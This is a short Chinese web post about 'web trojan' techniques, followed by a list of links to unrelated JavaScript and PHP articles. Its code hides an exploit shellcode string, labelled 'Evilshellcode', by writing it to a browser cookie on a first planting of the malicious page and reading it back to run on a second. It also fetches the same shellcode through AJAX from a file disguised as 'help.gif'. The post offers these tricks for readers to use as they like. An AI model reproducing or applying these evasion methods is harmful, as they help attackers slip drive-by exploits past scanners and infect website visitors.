一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
学习YUI.Ext第五日--做拖放Darg&amp;Drop
Mar 10 Javascript
TBCompressor js代码压缩
Jan 05 Javascript
用JQuery模仿淘宝的图片放大镜显示效果
Sep 15 Javascript
Js+Jq获取URL参数的集中方法示例代码
May 20 Javascript
JS实现左右拖动改变内容显示区域大小的方法
Oct 13 Javascript
jQuery插件支持同一页面被多次调用
Feb 14 Javascript
探寻JavaScript中this指针指向
Apr 23 Javascript
bootstrap3 dialog 更强大、更灵活的模态框
Apr 20 Javascript
为你的微信小程序体积瘦身详解
May 20 Javascript
JS实现获取汉字首字母拼音、全拼音及混拼音的方法
Nov 14 Javascript
基于vue和bootstrap实现简单留言板功能
May 30 Javascript
vue添加锚点,实现滚动页面时锚点添加相应的class操作
Aug 10 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
PHP+AJAX实现无刷新注册(带用户名实时检测)
2006/12/02 PHP
PHP运行环境配置与开发环境的配置(图文教程)
2013/06/04 PHP
关于使用coreseek并为其做分页的介绍
2013/06/21 PHP
ThinkPHP访问不存在的模块跳转到404页面的方法
2014/06/19 PHP
PHP实现的json类实例
2015/07/28 PHP
php提交post数组参数实例分析
2015/12/17 PHP
PHP会员找回密码功能的简单实现
2016/09/05 PHP
PHP遍历目录文件的常用方法小结
2017/02/03 PHP
PHP中TP5 上传文件的实例详解
2017/07/31 PHP
php函数式编程简单示例
2019/08/08 PHP
用javascript自动显示最后更新时间
2007/03/15 Javascript
javascript 火狐(firefox)不显示本地图片问题解决
2008/07/05 Javascript
Javascript 构造函数 实例分析
2008/11/26 Javascript
js获取单元格自定义属性值的代码(IE/Firefox)
2010/04/05 Javascript
jquery动画1.加载指示器
2012/08/24 Javascript
js 金额格式化来回转换示例
2014/02/23 Javascript
延时加载JavaScript代码提高速度
2015/12/27 Javascript
jQuery easyUI datagrid 增加求和统计行的实现代码
2016/06/01 Javascript
Nodejs全局安装和本地安装的不同之处
2016/07/04 NodeJs
JavaScript 函数的定义-调用、注意事项
2017/04/16 Javascript
详解如何构建Angular项目目录结构
2017/07/13 Javascript
angular中两种表单的区别(响应式和模板驱动表单)
2018/12/06 Javascript
Element-Ui组件 NavMenu 导航菜单的具体使用
2019/10/24 Javascript
python 字符串格式化代码
2013/03/17 Python
wxPython事件驱动实例详解
2014/09/28 Python
Python 基于Twisted框架的文件夹网络传输源码
2016/08/28 Python
Python 模拟员工信息数据库操作的实例
2017/10/23 Python
windows下的pycharm安装及其设置中文菜单
2020/04/23 Python
俄罗斯电动工具和设备购物网站:Vseinstrumenti.ru
2020/11/12 全球购物
高中生自我鉴定范文
2013/10/30 职场文书
社区志愿者心得体会
2014/01/03 职场文书
共青团员自我评价范文
2014/09/14 职场文书
房产协议书范本
2014/10/18 职场文书
2015年防灾减灾工作总结
2015/07/24 职场文书
解决Django transaction进行事务管理踩过的坑
2021/04/24 Python
使用numpy实现矩阵的翻转(flip)与旋转
2021/06/03 Python